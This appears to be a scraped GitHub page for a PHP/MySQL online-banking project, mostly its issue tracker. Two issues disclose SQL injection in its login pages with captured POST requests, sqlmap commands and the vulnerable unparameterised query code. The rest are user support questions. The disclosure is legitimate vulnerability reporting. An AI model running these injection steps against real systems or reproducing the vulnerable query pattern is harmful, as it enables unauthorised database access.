g33kyrash / online-banking-system Goto Github PK

View Code? Open in Web Editor NEW

152.0 152.0 177.0 190 KB

Online Banking System in PHP & MySQL

PHP 93.64% CSS 4.69% Hack 1.67%

online-banking-system's People

Contributors

Stargazers

Watchers

Forkers

abhijh jeyabalaji danywarner gavrilo-princip mehtanishant2010 rukewetony jemmy655 ask4eazy itahmid won21kr invinciblehackerrishi dukenst2006 rahulxcode ehsanmoh iblisbuu emadshanab sagitaire maximusperfectus kfbaby amad4biz itsns payapp favourch efarid15 icasimpan-experimental josevaisman saidreamx webdv cloudxtreme hadiofbbg willvin313 ibrahimng jessicagarcia23 princehr wahidprozz syedarifulislamemon karthick2696 cephasvista humfricz gajarthan moderngnostic shilpa johnmahugu sonyzx erfansol bxmas13 jshartshorn kaizenengine onyema3 thearaoeun crazyavi neux7z ehconstant pavlikdee tarequ phyoeko terrisgo muhammadchaudhary 3etechinns sanjana134 abraham313 catman85 techtric254 kirun1 alihaskar tncyrdmc warofthestate jwcastillo alteredoracle nangs samuelmasaka44 bkuzmacissp elijahbee ajayjoshi879 coresoft2 mrinalrai alikir iammainul internetzero trust0 blackluv dthinkcs leanderdulac itsmesachee virajsoysa webprasanth kikemascote manuhernz finalcd shivakant1999 kevinlluka slyzingbergi harshalgithub srivallyrao askolock nkemdev lescientifikk solayunus safari890 xkobxx

online-banking-system's Issues

There is a SQL injection vulnerability in staff_login.php

poc

First visit http://ip:port/staff_login.php

Enter any user and password，Use burp to capture packets

Modify the data package as follows, save as data.txt:

POST /staff_login.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://localhost:8888
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

uname=*&pwd=admin&submitBtn=Log+In

execute SQLmap
python sqlmap.py -r data.txt --batch --current-user

analysis

file staff_login.php line 43

    $username=$_REQUEST['uname'];
    $password=$_REQUEST['pwd'];
    $sql="SELECT email,pwd FROM staff WHERE email='$username' AND pwd='$password'";

without any filter for username and password

There is a SQL injection vulnerability in index.php

First visit http://IP:port/index.php

Enter any user and password，Use burp to capture packets

Modify the data package as follows, save as data.txt:

POST /index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://127.0.0.1/index.php
Cookie: PHPSESSID=r8l3df9nrcqh7aluf2m9lb6ah0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

uname=*&pwd=dddddddd&submitBtn=Log+In

execute SQLmap

sqlmap -r data.txt --batch

bank balances

how about including balances?
like current amount in account.

Hello developers, can you add a version number?

Error Message upon login

This is the error message i receive when trying to login is this suppose to happen? please help

Fatal error: Uncaught Error: Call to undefined function mysql_connect() in C:\xampp\htdocs\banking_inc\dbconn.php:6 Stack trace: #0 C:\xampp\htdocs\banking\index.php(15): include() #1 {main} thrown in C:\xampp\htdocs\banking_inc\dbconn.php on line 6

unable to login

there is no responce for login button for customer and staff please fix it

login password and username for admin

Unable to login using admin / customer login

Hi,

After full configuration as instructed, the admin login is not happening as it was supposed to. I even changed the password from admin to admin123.

I have checked the database and its configuration in the _inc folder, and the same is uploaded in the server as latest configuration file.

This is the same case with customer login too. When I login using the customer credentials, the page redirects and the page is blank. On the admin page, the page doesn't react after entering the username and password, no redirect, nothing.

Any help in this regard? I will recheck the db, but i feel its the code, not the db!

Thanks in advance

hosting Server

I installed this on a hosting server thought cpanel, doesn't seem to be working right. i can't login to any accounts or admin

Need db file please

i need a db file to upload to php my admin

MaweBank

Dedicated to Sir. Mawe Olumuyiwa Awe
My Honorable

DB File missing

Kindly let me know where the DB file is...

Hello

The "Screenshots and description" link leads to a porn site

When you click on the link to see the screenshots and description, it leads to a shady website with porn on it. It does not contain any screenshots or a description.

I'm not able to login

I tried to login to admin using admin/admin and it's telling me admin_homepage cannot be found?
Also what are the usernames of the preexisting users and i cannot see that in the database.

Thanks

Banking verification Software

Add Beneficiary issue

please can you guide me on this script, i cannot add beneficiary what is the problem???

Can I use this system?

Hey,
Sorry for opening an issue but I found no other way to contact you.
I'd like to use the system for a micronational bank.
You can read about micronationalism over here: micronations.wiki
I promise not to use it for any illegal purposes and/or in any illegal way.
If you'd like me to present details as a guarantee, leave your mail and I will.

Thanks in advance,
elBandoler.

How to import the sql files?

need some help ~

Staff and Admin login details

After visiting the admin login page, i don't know the username and pass to login with